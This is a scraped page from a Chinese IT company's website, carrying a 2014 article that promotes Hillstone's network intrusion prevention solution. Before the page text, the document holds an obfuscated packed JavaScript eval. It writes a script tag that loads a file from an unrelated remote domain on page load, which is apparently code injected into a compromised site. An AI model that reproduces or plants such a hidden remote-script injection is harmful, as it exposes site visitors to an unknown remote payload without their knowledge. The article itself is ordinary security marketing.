;eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('b.2.c(\'<7 a="9/5" 8="4://0-d.1/3.6">\');',62,14,'andylawabwinicloud|com|document|hhh|https|javascript|js|script|src|text|type|window|write|zxcvbasdqwe'.split('|'),0,{})); 陕西国泰信息科技发展有限公司

您的位置:陕西国泰信息科技发展有限公司 > 视频工程方案
山石网科发布网络入侵防御系统解决方案
分类:视频工程方案    文章来源:    点击数:2907     更新时间:2014-2-21


  黑客攻击、蠕虫病毒、木马后门、间谍软件、僵尸网络、DDoS攻击等许许多多的安全威胁,给企业网络用户带来了十足困扰;同时P2P下载、网络游戏、在线视频等对于网络资源的滥用,也会给企业带来损失。传统的攻击防御技术已经无法应付当今复杂多样的安全需求。因此,令众多网络管理员头疼的问题是如何找到一个安全解决方案,可以对网络威胁进行深层防御,对网络攻击进行精确阻断,并且能够高效稳定的运行,以全面保障用户网络的安全。
  对此,山石网科发布了其依托于Hillstone IPS产品的网络入侵防御系统解决方案以帮助用户解决类似问题,方案针对日趋复杂的应用层安全威胁和多种网络攻击,包括提供2-7层的入侵防御,准确监测网络异常流量,针对蠕虫木马、间谍软件、僵尸网络以及缓冲区溢出和SQL注入/XSS攻击等各类攻击进行实时检测和防御,并且采用先进的应用识别检测技术,实现应用层深度防护;同时通过灵活的流量管控功能,有效限制带宽滥用,确保关键业务的正常稳定运作。
  Hillstone IPS支持在线部署和旁路部署模式,可根据具体应用环境,选择合适的部署模式。例如在线部署,可实时检测出威胁信息并及时阻断;旁路部署时,IPS处于监控模式,一旦发现威胁信息,可以及时生成日志并发出告警信息,帮助网络管理员有效监控并分析网络安全态势。
  网络入侵防御系统解决方案具有以下几个突出特点:
 
  1) 全面入侵防御,过滤网络恶意流量
  Hillstone IPS提供了全面的攻击防御功能。例如针对当前主要的应用层攻击,高效多核安全引擎能够深入到应用的内容层进行检查,及时发现XSS、SQL注入等常见应用层攻击并有效阻断。同时,设备内置流量异常攻击检测模块,能够有效过滤IP/端口扫描类攻击、DoS/DDoS等异常流量型攻击。通过多种威胁过滤技术,能够为企业网络提供全方位安全保护。
  2) 精确应用识别,实现网络应用可控
  方案中完全利用了Hillstone IPS业界领先的智能应用识别技术,可识别出20大类,1800种以上的网络应用,包括IM、P2P、游戏软件、流媒体等常见应用。即使是一些采用端口跳转或协议加密技术的P2P软件,其依然可以通过行为模式智能分析,从数据流中精确识别出应用类型。结合丰富的管理策略,能够帮助管理员实现网络应用的可视、可控。
  3) 专业Botnet检测,杜绝僵尸网络危害
  Hillstone IPS提供业界最完整的Botnet数据库,包括C&C (命令及控制)特征库和Real-time Black List(实时侦测黑名单)库。当感染Botnet的内网主机与远程控制服务器联机时,IPS通过通信特征检测发现及时触发相应的响应行为,从而杜绝Botnet对网络的危害,保障业务的正常运行。
  4) 灵活流量管控,保障业务运行效率
  Hillstone IPS支持灵活的流量管理功能,可以基于应用、角色、IP、时间等进行可用带宽控制,例如最大带宽限制及最小带宽保证,以保障关键业务的可用带宽和传输效率。此外,还支持流量配额管理功能,管理员可以根据IP地址或网段进行每日、每周或每月的可用总流量配额控制,一旦超过配额,可以禁止上网或是限制速度。借助灵活的流量管控技术,管理员可以在关键应用带宽保障与用户上网体验之间取得平衡。
  5) 虚拟IPS,不同应用安全有别
  Hillstone IPS支持虚拟IPS功能,可以将一台物理IPS设备划分为多台逻辑的虚拟IPS,不同虚拟IPS拥有独立的配置管理界面及独立的安全防御策略。网络管理员可以根据防护对象,例如WEB服务器、应用服务器等不同防护目标,配置独立的安全防护策略,从而满足不同应用环境下多样化的安全需求,实现灵活安全。
  6) 虚拟安全补丁, 漏洞修补“零时差”
  作为微软“MAPP”(Microsoft Active Protections Program)成员,Hillstone能够在微软对外公布安全漏洞信息之前提前获取漏洞细节信息,通过及时更新特征库,为用户提供“虚拟安全补丁“,从而第一时间为用户提供安全保护。此外,针对一些无法安装补丁的应用系统,通过Hillstone”虚拟安全补丁“技术,能够提供与应用系统安装补丁同样的防护效果,有效保障应用系统安全。

 

上一条新闻:瞩目云视频会议系统
下一条新闻:x86服务器9大技术应用特点
     
 
新闻中心
·A1-01-IBM服务器基础培训
·网域产品手册
·浪潮英信NF5270M3简述
·十九大在即,这样的安全保障您需要吗?
·从IDC报告看下一代防火墙的趋势
·上海联合产权交易所:IT集中可控从云数据
·病毒肆虐的今天,一起来学习病毒防御小知
·预警!勒索病毒又来了!Petya病毒大规模爆
·深信服的“大招”
·深信服的“三朵云”
·我公司新加入深信服的上网行为管理设备
·联想亮相GITC2016全球互联网技术大会
·为什么现在要升级您企业的服务器基础设施
·英国国家电网:物联网将有利于向可再生能源
·国产服务器制胜国外品牌的突围之路
·云主机可以完全替代虚拟主机的市场吗?
·为什么现在要升级您企业的服务器基础设施
·云计算业务的发展对数据中心有了更高的要
·关于配置管理系统的功能及其重要性的深度
·浅析虚拟化市场竞争格局
·浅谈云计算技术和虚拟化之间的联系
·如何在IT行业中保持竞争力
·超级融合基础设施适合你的组织吗?
·陕西省大数据产业建设走在全国前列
·大数据如何驱动企业发展
·未来企业级云计算发展特征与趋势
·云计算大比拼:一些知名供应商瞄准云计算
·云时代的大型机,能否重铸辉煌
·进行云迁移, 看起来挑战重重……
·IT趋势:横向扩展架构在数据中心持续增长
友情链接: DELL官网  |   深信服  |   陕西国泰信息公司的店铺  |   中关村在线  |   IBM官网  |   浪潮官网  |  
版权所有:陕西国泰信息科技发展有限公司 技术支持:陕西万博   陕ICP备11010493号